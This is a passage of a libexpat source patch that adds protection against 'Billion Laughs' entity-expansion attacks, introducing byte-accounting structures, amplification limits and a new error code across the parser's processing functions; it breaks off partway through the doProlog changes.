+ lib/libexpatw.def |    3 +
+ lib/xmlparse.c    | 1147 +++++++++++++++++++++++++++++++++++++--
+ 5 files changed, 1143 insertions(+), 61 deletions(-)
+
+diff --git a/lib/expat.h b/lib/expat.h
+index 48a6e2a3..0fb70d9d 100644
+--- a/lib/expat.h
++++ b/lib/expat.h
+@@ -115,7 +115,9 @@ enum XML_Error {
+   XML_ERROR_RESERVED_PREFIX_XMLNS,
+   XML_ERROR_RESERVED_NAMESPACE_URI,
+   /* Added in 2.2.1. */
+-  XML_ERROR_INVALID_ARGUMENT
++  XML_ERROR_INVALID_ARGUMENT,
++  /* Added in 2.4.0. */
++  XML_ERROR_AMPLIFICATION_LIMIT_BREACH
+ };
+ 
+ enum XML_Content_Type {
+@@ -997,7 +999,10 @@ enum XML_FeatureEnum {
+   XML_FEATURE_SIZEOF_XML_LCHAR,
+   XML_FEATURE_NS,
+   XML_FEATURE_LARGE_SIZE,
+-  XML_FEATURE_ATTR_INFO
++  XML_FEATURE_ATTR_INFO,
++  /* Added in Expat 2.4.0. */
++  XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT,
++  XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT
+   /* Additional features must be added to the end of this enum. */
+ };
+ 
+@@ -1010,6 +1015,18 @@ typedef struct {
+ XMLPARSEAPI(const XML_Feature *)
+ XML_GetFeatureList(void);
+ 
++#ifdef XML_DTD
++/* Added in Expat 2.4.0. */
++XMLPARSEAPI(XML_Bool)
++XML_SetBillionLaughsAttackProtectionMaximumAmplification(
++    XML_Parser parser, float maximumAmplificationFactor);
++
++/* Added in Expat 2.4.0. */
++XMLPARSEAPI(XML_Bool)
++XML_SetBillionLaughsAttackProtectionActivationThreshold(
++    XML_Parser parser, unsigned long long activationThresholdBytes);
++#endif
++
+ /* Expat follows the semantic versioning convention.
+    See http://semver.org.
+ */
+diff --git a/lib/internal.h b/lib/internal.h
+index 60913dab..d8b31fa2 100644
+--- a/lib/internal.h
++++ b/lib/internal.h
+@@ -101,10 +101,40 @@
+ #  endif
+ #endif
+ 
++#include <limits.h> // ULONG_MAX
++
++#if defined(_WIN32) && ! defined(__USE_MINGW_ANSI_STDIO)
++#  define EXPAT_FMT_ULL(midpart) "%" midpart "I64u"
++#  if defined(_WIN64) // Note: modifier "td" does not work for MinGW
++#    define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "I64d"
++#  else
++#    define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "d"
++#  endif
++#else
++#  define EXPAT_FMT_ULL(midpart) "%" midpart "llu"
++#  if ! defined(ULONG_MAX)
++#    error Compiler did not define ULONG_MAX for us
++#  elif ULONG_MAX == 18446744073709551615u // 2^64-1
++#    define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "ld"
++#  else
++#    define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "d"
++#  endif
++#endif
++
+ #ifndef UNUSED_P
+ #  define UNUSED_P(p) (void)p
+ #endif
+ 
++/* NOTE BEGIN If you ever patch these defaults to greater values
++              for non-attack XML payload in your environment,
++              please file a bug report with libexpat.  Thank you!
++*/
++#define EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT   \
++  100.0f
++#define EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT    \
++  8388608 // 8 MiB, 2^23
++/* NOTE END */
++
+ #ifdef __cplusplus
+ extern "C" {
+ #endif
+diff --git a/lib/libexpat.def b/lib/libexpat.def
+index 16faf595..5aefa6df 100644
+--- a/lib/libexpat.def
++++ b/lib/libexpat.def
+@@ -76,3 +76,6 @@ EXPORTS
+   XML_SetHashSalt @67
+ ; added with version 2.2.5
+   _INTERNAL_trim_to_complete_utf8_characters @68
++; added with version 2.4.0
++  XML_SetBillionLaughsAttackProtectionActivationThreshold @69
++  XML_SetBillionLaughsAttackProtectionMaximumAmplification @70
+diff --git a/lib/libexpatw.def b/lib/libexpatw.def
+index 16faf595..5aefa6df 100644
+--- a/lib/libexpatw.def
++++ b/lib/libexpatw.def
+@@ -76,3 +76,6 @@ EXPORTS
+   XML_SetHashSalt @67
+ ; added with version 2.2.5
+   _INTERNAL_trim_to_complete_utf8_characters @68
++; added with version 2.4.0
++  XML_SetBillionLaughsAttackProtectionActivationThreshold @69
++  XML_SetBillionLaughsAttackProtectionMaximumAmplification @70
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 3aaf35b9..6790bc28 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -47,6 +47,8 @@
+ #include <limits.h> /* UINT_MAX */
+ #include <stdio.h>  /* fprintf */
+ #include <stdlib.h> /* getenv, rand_s */
++#include <stdint.h> /* uintptr_t */
++#include <math.h>   /* isnan */
+ 
+ #ifdef _WIN32
+ #  define getpid GetCurrentProcessId
+@@ -373,6 +375,31 @@ typedef struct open_internal_entity {
+   XML_Bool betweenDecl; /* WFC: PE Between Declarations */
+ } OPEN_INTERNAL_ENTITY;
+ 
++enum XML_Account {
++  XML_ACCOUNT_DIRECT,           /* bytes directly passed to the Expat parser */
++  XML_ACCOUNT_ENTITY_EXPANSION, /* intermediate bytes produced during entity
++                                   expansion */
++  XML_ACCOUNT_NONE              /* i.e. do not account, was accounted already */
++};
++
++#ifdef XML_DTD
++typedef unsigned long long XmlBigCount;
++typedef struct accounting {
++  XmlBigCount countBytesDirect;
++  XmlBigCount countBytesIndirect;
++  int debugLevel;
++  float maximumAmplificationFactor; // >=1.0
++  unsigned long long activationThresholdBytes;
++} ACCOUNTING;
++
++typedef struct entity_stats {
++  unsigned int countEverOpened;
++  unsigned int currentDepth;
++  unsigned int maximumDepthSeen;
++  int debugLevel;
++} ENTITY_STATS;
++#endif /* XML_DTD */
++
+ typedef enum XML_Error PTRCALL Processor(XML_Parser parser, const char *start,
+                                          const char *end, const char **endPtr);
+ 
+@@ -403,16 +430,18 @@ static enum XML_Error initializeEncoding(XML_Parser parser);
+ static enum XML_Error doProlog(XML_Parser parser, const ENCODING *enc,
+                                const char *s, const char *end, int tok,
+                                const char *next, const char **nextPtr,
+-                               XML_Bool haveMore, XML_Bool allowClosingDoctype);
++                               XML_Bool haveMore, XML_Bool allowClosingDoctype,
++                               enum XML_Account account);
+ static enum XML_Error processInternalEntity(XML_Parser parser, ENTITY *entity,
+                                             XML_Bool betweenDecl);
+ static enum XML_Error doContent(XML_Parser parser, int startTagLevel,
+                                 const ENCODING *enc, const char *start,
+                                 const char *end, const char **endPtr,
+-                                XML_Bool haveMore);
++                                XML_Bool haveMore, enum XML_Account account);
+ static enum XML_Error doCdataSection(XML_Parser parser, const ENCODING *,
+                                      const char **startPtr, const char *end,
+-                                     const char **nextPtr, XML_Bool haveMore);
++                                     const char **nextPtr, XML_Bool haveMore,
++                                     enum XML_Account account);
+ #ifdef XML_DTD
+ static enum XML_Error doIgnoreSection(XML_Parser parser, const ENCODING *,
+                                       const char **startPtr, const char *end,
+@@ -422,7 +451,8 @@ static enum XML_Error doIgnoreSection(XML_Parser parser, const ENCODING *,
+ static void freeBindings(XML_Parser parser, BINDING *bindings);
+ static enum XML_Error storeAtts(XML_Parser parser, const ENCODING *,
+                                 const char *s, TAG_NAME *tagNamePtr,
+-                                BINDING **bindingsPtr);
++                                BINDING **bindingsPtr,
++                                enum XML_Account account);
+ static enum XML_Error addBinding(XML_Parser parser, PREFIX *prefix,
+                                  const ATTRIBUTE_ID *attId, const XML_Char *uri,
+                                  BINDING **bindingsPtr);
+@@ -431,15 +461,18 @@ static int defineAttribute(ELEMENT_TYPE *type, ATTRIBUTE_ID *, XML_Bool isCdata,
+                            XML_Parser parser);
+ static enum XML_Error storeAttributeValue(XML_Parser parser, const ENCODING *,
+                                           XML_Bool isCdata, const char *,
+-                                          const char *, STRING_POOL *);
++                                          const char *, STRING_POOL *,
++                                          enum XML_Account account);
+ static enum XML_Error appendAttributeValue(XML_Parser parser, const ENCODING *,
+                                            XML_Bool isCdata, const char *,
+-                                           const char *, STRING_POOL *);
++                                           const char *, STRING_POOL *,
++                                           enum XML_Account account);
+ static ATTRIBUTE_ID *getAttributeId(XML_Parser parser, const ENCODING *enc,
+                                     const char *start, const char *end);
+ static int setElementTypePrefix(XML_Parser parser, ELEMENT_TYPE *);
+ static enum XML_Error storeEntityValue(XML_Parser parser, const ENCODING *enc,
+-                                       const char *start, const char *end);
++                                       const char *start, const char *end,
++                                       enum XML_Account account);
+ static int reportProcessingInstruction(XML_Parser parser, const ENCODING *enc,
+                                        const char *start, const char *end);
+ static int reportComment(XML_Parser parser, const ENCODING *enc,
+@@ -503,6 +536,35 @@ static XML_Parser parserCreate(const XML_Char *encodingName,
+ 
+ static void parserInit(XML_Parser parser, const XML_Char *encodingName);
+ 
++#ifdef XML_DTD
++static float accountingGetCurrentAmplification(XML_Parser rootParser);
++static void accountingReportStats(XML_Parser originParser, const char *epilog);
++static void accountingOnAbort(XML_Parser originParser);
++static void accountingReportDiff(XML_Parser rootParser,
++                                 unsigned int levelsAwayFromRootParser,
++                                 const char *before, const char *after,
++                                 ptrdiff_t bytesMore, int source_line,
++                                 enum XML_Account account);
++static XML_Bool accountingDiffTolerated(XML_Parser originParser, int tok,
++                                        const char *before, const char *after,
++                                        int source_line,
++                                        enum XML_Account account);
++
++static void entityTrackingReportStats(XML_Parser parser, ENTITY *entity,
++                                      const char *action, int sourceLine);
++static void entityTrackingOnOpen(XML_Parser parser, ENTITY *entity,
++                                 int sourceLine);
++static void entityTrackingOnClose(XML_Parser parser, ENTITY *entity,
++                                  int sourceLine);
++
++static XML_Parser getRootParserOf(XML_Parser parser,
++                                  unsigned int *outLevelDiff);
++static const char *unsignedCharToPrintable(unsigned char c);
++#endif /* XML_DTD */
++
++static unsigned long getDebugLevel(const char *variableName,
++                                   unsigned long defaultDebugLevel);
++
+ #define poolStart(pool) ((pool)->start)
+ #define poolEnd(pool) ((pool)->ptr)
+ #define poolLength(pool) ((pool)->ptr - (pool)->start)
+@@ -616,6 +678,10 @@ struct XML_ParserStruct {
+   enum XML_ParamEntityParsing m_paramEntityParsing;
+ #endif
+   unsigned long m_hash_secret_salt;
++#ifdef XML_DTD
++  ACCOUNTING m_accounting;
++  ENTITY_STATS m_entity_stats;
++#endif
+ };
+ 
+ #define MALLOC(parser, s) (parser->m_mem.malloc_fcn((s)))
+@@ -1055,6 +1121,18 @@ parserInit(XML_Parser parser, const XML_Char *encodingName) {
+   parser->m_paramEntityParsing = XML_PARAM_ENTITY_PARSING_NEVER;
+ #endif
+   parser->m_hash_secret_salt = 0;
++
++#ifdef XML_DTD
++  memset(&parser->m_accounting, 0, sizeof(ACCOUNTING));
++  parser->m_accounting.debugLevel = getDebugLevel("EXPAT_ACCOUNTING_DEBUG", 0u);
++  parser->m_accounting.maximumAmplificationFactor
++      = EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT;
++  parser->m_accounting.activationThresholdBytes
++      = EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT;
++
++  memset(&parser->m_entity_stats, 0, sizeof(ENTITY_STATS));
++  parser->m_entity_stats.debugLevel = getDebugLevel("EXPAT_ENTITY_DEBUG", 0u);
++#endif
+ }
+ 
+ /* moves list of bindings to m_freeBindingList */
+@@ -2318,6 +2396,10 @@ XML_ErrorString(enum XML_Error code) {
+   /* Added in 2.2.5. */
+   case XML_ERROR_INVALID_ARGUMENT: /* Constant added in 2.2.1, already */
+     return XML_L("invalid argument");
++  /* Added in 2.4.0. */
++  case XML_ERROR_AMPLIFICATION_LIMIT_BREACH:
++    return XML_L(
++        "limit on input amplification factor (from DTD and entities) breached");
+   }
+   return NULL;
+ }
+@@ -2354,41 +2436,75 @@ XML_ExpatVersionInfo(void) {
+ 
+ const XML_Feature *XMLCALL
+ XML_GetFeatureList(void) {
+-  static const XML_Feature features[]
+-      = {{XML_FEATURE_SIZEOF_XML_CHAR, XML_L("sizeof(XML_Char)"),
+-          sizeof(XML_Char)},
+-         {XML_FEATURE_SIZEOF_XML_LCHAR, XML_L("sizeof(XML_LChar)"),
+-          sizeof(XML_LChar)},
++  static const XML_Feature features[] = {
++      {XML_FEATURE_SIZEOF_XML_CHAR, XML_L("sizeof(XML_Char)"),
++       sizeof(XML_Char)},
++      {XML_FEATURE_SIZEOF_XML_LCHAR, XML_L("sizeof(XML_LChar)"),
++       sizeof(XML_LChar)},
+ #ifdef XML_UNICODE
+-         {XML_FEATURE_UNICODE, XML_L("XML_UNICODE"), 0},
++      {XML_FEATURE_UNICODE, XML_L("XML_UNICODE"), 0},
+ #endif
+ #ifdef XML_UNICODE_WCHAR_T
+-         {XML_FEATURE_UNICODE_WCHAR_T, XML_L("XML_UNICODE_WCHAR_T"), 0},
++      {XML_FEATURE_UNICODE_WCHAR_T, XML_L("XML_UNICODE_WCHAR_T"), 0},
+ #endif
+ #ifdef XML_DTD
+-         {XML_FEATURE_DTD, XML_L("XML_DTD"), 0},
++      {XML_FEATURE_DTD, XML_L("XML_DTD"), 0},
+ #endif
+ #ifdef XML_CONTEXT_BYTES
+-         {XML_FEATURE_CONTEXT_BYTES, XML_L("XML_CONTEXT_BYTES"),
+-          XML_CONTEXT_BYTES},
++      {XML_FEATURE_CONTEXT_BYTES, XML_L("XML_CONTEXT_BYTES"),
++       XML_CONTEXT_BYTES},
+ #endif
+ #ifdef XML_MIN_SIZE
+-         {XML_FEATURE_MIN_SIZE, XML_L("XML_MIN_SIZE"), 0},
++      {XML_FEATURE_MIN_SIZE, XML_L("XML_MIN_SIZE"), 0},
+ #endif
+ #ifdef XML_NS
+-         {XML_FEATURE_NS, XML_L("XML_NS"), 0},
++      {XML_FEATURE_NS, XML_L("XML_NS"), 0},
+ #endif
+ #ifdef XML_LARGE_SIZE
+-         {XML_FEATURE_LARGE_SIZE, XML_L("XML_LARGE_SIZE"), 0},
++      {XML_FEATURE_LARGE_SIZE, XML_L("XML_LARGE_SIZE"), 0},
+ #endif
+ #ifdef XML_ATTR_INFO
+-         {XML_FEATURE_ATTR_INFO, XML_L("XML_ATTR_INFO"), 0},
++      {XML_FEATURE_ATTR_INFO, XML_L("XML_ATTR_INFO"), 0},
+ #endif
+-         {XML_FEATURE_END, NULL, 0}};
++#ifdef XML_DTD
++      /* Added in Expat 2.4.0. */
++      {XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT,
++       XML_L("XML_BLAP_MAX_AMP"),
++       (long int)
++           EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT},
++      {XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT,
++       XML_L("XML_BLAP_ACT_THRES"),
++       EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT},
++#endif
++      {XML_FEATURE_END, NULL, 0}};
+ 
+   return features;
+ }
+ 
++#ifdef XML_DTD
++XML_Bool XMLCALL
++XML_SetBillionLaughsAttackProtectionMaximumAmplification(
++    XML_Parser parser, float maximumAmplificationFactor) {
++  if ((parser == NULL) || (parser->m_parentParser != NULL)
++      || isnan(maximumAmplificationFactor)
++      || (maximumAmplificationFactor < 1.0f)) {
++    return XML_FALSE;
++  }
++  parser->m_accounting.maximumAmplificationFactor = maximumAmplificationFactor;
++  return XML_TRUE;
++}
++
++XML_Bool XMLCALL
++XML_SetBillionLaughsAttackProtectionActivationThreshold(
++    XML_Parser parser, unsigned long long activationThresholdBytes) {
++  if ((parser == NULL) || (parser->m_parentParser != NULL)) {
++    return XML_FALSE;
++  }
++  parser->m_accounting.activationThresholdBytes = activationThresholdBytes;
++  return XML_TRUE;
++}
++#endif /* XML_DTD */
++
+ /* Initially tag->rawName always points into the parse buffer;
+    for those TAG instances opened while the current parse buffer was
+    processed, and not yet closed, we need to store tag->rawName in a more
+@@ -2441,9 +2557,9 @@ storeRawNames(XML_Parser parser) {
+ static enum XML_Error PTRCALL
+ contentProcessor(XML_Parser parser, const char *start, const char *end,
+                  const char **endPtr) {
+-  enum XML_Error result
+-      = doContent(parser, 0, parser->m_encoding, start, end, endPtr,
+-                  (XML_Bool)! parser->m_parsingStatus.finalBuffer);
++  enum XML_Error result = doContent(
++      parser, 0, parser->m_encoding, start, end, endPtr,
++      (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_ACCOUNT_DIRECT);
+   if (result == XML_ERROR_NONE) {
+     if (! storeRawNames(parser))
+       return XML_ERROR_NO_MEMORY;
+@@ -2468,6 +2584,14 @@ externalEntityInitProcessor2(XML_Parser parser, const char *start,
+   int tok = XmlContentTok(parser->m_encoding, start, end, &next);
+   switch (tok) {
+   case XML_TOK_BOM:
++#ifdef XML_DTD
++    if (! accountingDiffTolerated(parser, tok, start, next, __LINE__,
++                                  XML_ACCOUNT_DIRECT)) {
++      accountingOnAbort(parser);
++      return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++    }
++#endif /* XML_DTD */
++
+     /* If we are at the end of the buffer, this would cause the next stage,
+        i.e. externalEntityInitProcessor3, to pass control directly to
+        doContent (by detecting XML_TOK_NONE) without processing any xml text
+@@ -2505,6 +2629,10 @@ externalEntityInitProcessor3(XML_Parser parser, const char *start,
+   const char *next = start; /* XmlContentTok doesn't always set the last arg */
+   parser->m_eventPtr = start;
+   tok = XmlContentTok(parser->m_encoding, start, end, &next);
++  /* Note: These bytes are accounted later in:
++           - processXmlDecl
++           - externalEntityContentProcessor
++  */
+   parser->m_eventEndPtr = next;
+ 
+   switch (tok) {
+@@ -2546,7 +2674,8 @@ externalEntityContentProcessor(XML_Parser parser, const char *start,
+                                const char *end, const char **endPtr) {
+   enum XML_Error result
+       = doContent(parser, 1, parser->m_encoding, start, end, endPtr,
+-                  (XML_Bool)! parser->m_parsingStatus.finalBuffer);
++                  (XML_Bool)! parser->m_parsingStatus.finalBuffer,
++                  XML_ACCOUNT_ENTITY_EXPANSION);
+   if (result == XML_ERROR_NONE) {
+     if (! storeRawNames(parser))
+       return XML_ERROR_NO_MEMORY;
+@@ -2557,7 +2686,7 @@ externalEntityContentProcessor(XML_Parser parser, const char *start,
+ static enum XML_Error
+ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+           const char *s, const char *end, const char **nextPtr,
+-          XML_Bool haveMore) {
++          XML_Bool haveMore, enum XML_Account account) {
+   /* save one level of indirection */
+   DTD *const dtd = parser->m_dtd;
+ 
+@@ -2575,6 +2704,17 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+   for (;;) {
+     const char *next = s; /* XmlContentTok doesn't always set the last arg */
+     int tok = XmlContentTok(enc, s, end, &next);
++#ifdef XML_DTD
++    const char *accountAfter
++        = ((tok == XML_TOK_TRAILING_RSQB) || (tok == XML_TOK_TRAILING_CR))
++              ? (haveMore ? s /* i.e. 0 bytes */ : end)
++              : next;
++    if (! accountingDiffTolerated(parser, tok, s, accountAfter, __LINE__,
++                                  account)) {
++      accountingOnAbort(parser);
++      return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++    }
++#endif
+     *eventEndPP = next;
+     switch (tok) {
+     case XML_TOK_TRAILING_CR:
+@@ -2630,6 +2770,14 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+       XML_Char ch = (XML_Char)XmlPredefinedEntityName(
+           enc, s + enc->minBytesPerChar, next - enc->minBytesPerChar);
+       if (ch) {
++#ifdef XML_DTD
++        /* NOTE: We are replacing 4-6 characters original input for 1 character
++         *       so there is no amplification and hence recording without
++         *       protection. */
++        accountingDiffTolerated(parser, tok, (char *)&ch,
++                                ((char *)&ch) + sizeof(XML_Char), __LINE__,
++                                XML_ACCOUNT_ENTITY_EXPANSION);
++#endif /* XML_DTD */
+         if (parser->m_characterDataHandler)
+           parser->m_characterDataHandler(parser->m_handlerArg, &ch, 1);
+         else if (parser->m_defaultHandler)
+@@ -2748,7 +2896,8 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+       }
+       tag->name.str = (XML_Char *)tag->buf;
+       *toPtr = XML_T('\0');
+-      result = storeAtts(parser, enc, s, &(tag->name), &(tag->bindings));
++      result
++          = storeAtts(parser, enc, s, &(tag->name), &(tag->bindings), account);
+       if (result)
+         return result;
+       if (parser->m_startElementHandler)
+@@ -2772,7 +2921,8 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+       if (! name.str)
+         return XML_ERROR_NO_MEMORY;
+       poolFinish(&parser->m_tempPool);
+-      result = storeAtts(parser, enc, s, &name, &bindings);
++      result = storeAtts(parser, enc, s, &name, &bindings,
++                         XML_ACCOUNT_NONE /* token spans whole start tag */);
+       if (result != XML_ERROR_NONE) {
+         freeBindings(parser, bindings);
+         return result;
+@@ -2907,7 +3057,8 @@ doContent(XML_Parser parser, int startTagLevel, const ENCODING *enc,
+       /* END disabled code */
+       else if (parser->m_defaultHandler)
+         reportDefault(parser, enc, s, next);
+-      result = doCdataSection(parser, enc, &next, end, nextPtr, haveMore);
++      result
++          = doCdataSection(parser, enc, &next, end, nextPtr, haveMore, account);
+       if (result != XML_ERROR_NONE)
+         return result;
+       else if (! next) {
+@@ -3036,7 +3187,8 @@ freeBindings(XML_Parser parser, BINDING *bindings) {
+ */
+ static enum XML_Error
+ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+-          TAG_NAME *tagNamePtr, BINDING **bindingsPtr) {
++          TAG_NAME *tagNamePtr, BINDING **bindingsPtr,
++          enum XML_Account account) {
+   DTD *const dtd = parser->m_dtd; /* save one level of indirection */
+   ELEMENT_TYPE *elementType;
+   int nDefaultAtts;
+@@ -3146,7 +3298,7 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+       /* normalize the attribute value */
+       result = storeAttributeValue(
+           parser, enc, isCdata, parser->m_atts[i].valuePtr,
+-          parser->m_atts[i].valueEnd, &parser->m_tempPool);
++          parser->m_atts[i].valueEnd, &parser->m_tempPool, account);
+       if (result)
+         return result;
+       appAtts[attIndex] = poolStart(&parser->m_tempPool);
+@@ -3535,9 +3687,9 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+ static enum XML_Error PTRCALL
+ cdataSectionProcessor(XML_Parser parser, const char *start, const char *end,
+                       const char **endPtr) {
+-  enum XML_Error result
+-      = doCdataSection(parser, parser->m_encoding, &start, end, endPtr,
+-                       (XML_Bool)! parser->m_parsingStatus.finalBuffer);
++  enum XML_Error result = doCdataSection(
++      parser, parser->m_encoding, &start, end, endPtr,
++      (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_ACCOUNT_DIRECT);
+   if (result != XML_ERROR_NONE)
+     return result;
+   if (start) {
+@@ -3557,7 +3709,8 @@ cdataSectionProcessor(XML_Parser parser, const char *start, const char *end,
+ */
+ static enum XML_Error
+ doCdataSection(XML_Parser parser, const ENCODING *enc, const char **startPtr,
+-               const char *end, const char **nextPtr, XML_Bool haveMore) {
++               const char *end, const char **nextPtr, XML_Bool haveMore,
++               enum XML_Account account) {
+   const char *s = *startPtr;
+   const char **eventPP;
+   const char **eventEndPP;
+@@ -3575,6 +3728,14 @@ doCdataSection(XML_Parser parser, const ENCODING *enc, const char **startPtr,
+   for (;;) {
+     const char *next;
+     int tok = XmlCdataSectionTok(enc, s, end, &next);
++#ifdef XML_DTD
++    if (! accountingDiffTolerated(parser, tok, s, next, __LINE__, account)) {
++      accountingOnAbort(parser);
++      return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++    }
++#else
++    UNUSED_P(account);
++#endif
+     *eventEndPP = next;
+     switch (tok) {
+     case XML_TOK_CDATA_SECT_CLOSE:
+@@ -3719,6 +3880,13 @@ doIgnoreSection(XML_Parser parser, const ENCODING *enc, const char **startPtr,
+   *eventPP = s;
+   *startPtr = NULL;
+   tok = XmlIgnoreSectionTok(enc, s, end, &next);
++#  ifdef XML_DTD
++  if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
++                                XML_ACCOUNT_DIRECT)) {
++    accountingOnAbort(parser);
++    return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++  }
++#  endif
+   *eventEndPP = next;
+   switch (tok) {
+   case XML_TOK_IGNORE_SECT:
+@@ -3803,6 +3971,15 @@ processXmlDecl(XML_Parser parser, int isGeneralTextEntity, const char *s,
+   const char *versionend;
+   const XML_Char *storedversion = NULL;
+   int standalone = -1;
++
++#ifdef XML_DTD
++  if (! accountingDiffTolerated(parser, XML_TOK_XML_DECL, s, next, __LINE__,
++                                XML_ACCOUNT_DIRECT)) {
++    accountingOnAbort(parser);
++    return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++  }
++#endif
++
+   if (! (parser->m_ns ? XmlParseXmlDeclNS : XmlParseXmlDecl)(
+           isGeneralTextEntity, parser->m_encoding, s, next, &parser->m_eventPtr,
+           &version, &versionend, &encodingName, &newEncoding, &standalone)) {
+@@ -3952,6 +4129,10 @@ entityValueInitProcessor(XML_Parser parser, const char *s, const char *end,
+ 
+   for (;;) {
+     tok = XmlPrologTok(parser->m_encoding, start, end, &next);
++    /* Note: Except for XML_TOK_BOM below, these bytes are accounted later in:
++             - storeEntityValue
++             - processXmlDecl
++    */
+     parser->m_eventEndPtr = next;
+     if (tok <= 0) {
+       if (! parser->m_parsingStatus.finalBuffer && tok != XML_TOK_INVALID) {
+@@ -3970,7 +4151,8 @@ entityValueInitProcessor(XML_Parser parser, const char *s, const char *end,
+         break;
+       }
+       /* found end of entity value - can store it now */
+-      return storeEntityValue(parser, parser->m_encoding, s, end);
++      return storeEntityValue(parser, parser->m_encoding, s, end,
++                              XML_ACCOUNT_DIRECT);
+     } else if (tok == XML_TOK_XML_DECL) {
+       enum XML_Error result;
+       result = processXmlDecl(parser, 0, start, next);
+@@ -3997,6 +4179,14 @@ entityValueInitProcessor(XML_Parser parser, const char *s, const char *end,
+     */
+     else if (tok == XML_TOK_BOM && next == end
+              && ! parser->m_parsingStatus.finalBuffer) {
++#  ifdef XML_DTD
++      if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
++                                    XML_ACCOUNT_DIRECT)) {
++        accountingOnAbort(parser);
++        return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++      }
++#  endif
++
+       *nextPtr = next;
+       return XML_ERROR_NONE;
+     }
+@@ -4039,16 +4229,24 @@ externalParEntProcessor(XML_Parser parser, const char *s, const char *end,
+   }
+   /* This would cause the next stage, i.e. doProlog to be passed XML_TOK_BOM.
+      However, when parsing an external subset, doProlog will not accept a BOM
+-     as valid, and report a syntax error, so we have to skip the BOM
++     as valid, and report a syntax error, so we have to skip the BOM, and
++     account for the BOM bytes.
+   */
+   else if (tok == XML_TOK_BOM) {
++    if (! accountingDiffTolerated(parser, tok, s, next, __LINE__,
++                                  XML_ACCOUNT_DIRECT)) {
++      accountingOnAbort(parser);
++      return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++    }
++
+     s = next;
+     tok = XmlPrologTok(parser->m_encoding, s, end, &next);
+   }
+ 
+   parser->m_processor = prologProcessor;
+   return doProlog(parser, parser->m_encoding, s, end, tok, next, nextPtr,
+-                  (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE);
++                  (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE,
++                  XML_ACCOUNT_DIRECT);
+ }
+ 
+ static enum XML_Error PTRCALL
+@@ -4061,6 +4259,9 @@ entityValueProcessor(XML_Parser parser, const char *s, const char *end,
+ 
+   for (;;) {
+     tok = XmlPrologTok(enc, start, end, &next);
++    /* Note: These bytes are accounted later in:
++             - storeEntityValue
++    */
+     if (tok <= 0) {
+       if (! parser->m_parsingStatus.finalBuffer && tok != XML_TOK_INVALID) {
+         *nextPtr = s;
+@@ -4078,7 +4279,7 @@ entityValueProcessor(XML_Parser parser, const char *s, const char *end,
+         break;
+       }
+       /* found end of entity value - can store it now */
+-      return storeEntityValue(parser, enc, s, end);
++      return storeEntityValue(parser, enc, s, end, XML_ACCOUNT_DIRECT);
+     }
+     start = next;
+   }
+@@ -4092,13 +4293,14 @@ prologProcessor(XML_Parser parser, const char *s, const char *end,
+   const char *next = s;
+   int tok = XmlPrologTok(parser->m_encoding, s, end, &next);
+   return doProlog(parser, parser->m_encoding, s, end, tok, next, nextPtr,
+-                  (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE);
++                  (XML_Bool)! parser->m_parsingStatus.finalBuffer, XML_TRUE,
++                  XML_ACCOUNT_DIRECT);
+ }
+ 
+ static enum XML_Error
+ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+          int tok, const char *next, const char **nextPtr, XML_Bool haveMore,
+-         XML_Bool allowClosingDoctype) {
++         XML_Bool allowClosingDoctype, enum XML_Account account) {
+ #ifdef XML_DTD
+   static const XML_Char externalSubsetName[] = {ASCII_HASH, '\0'};
+ #endif /* XML_DTD */
+@@ -4125,6 +4327,10 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+   static const XML_Char enumValueSep[] = {ASCII_PIPE, '\0'};
+   static const XML_Char enumValueStart[] = {ASCII_LPAREN, '\0'};
+ 
++#ifndef XML_DTD
++  UNUSED_P(account);
++#endif
++
+   /* save one level of indirection */
+   DTD *const dtd = parser->m_dtd;
+ 
+@@ -4189,6 +4395,19 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+       }
+     }
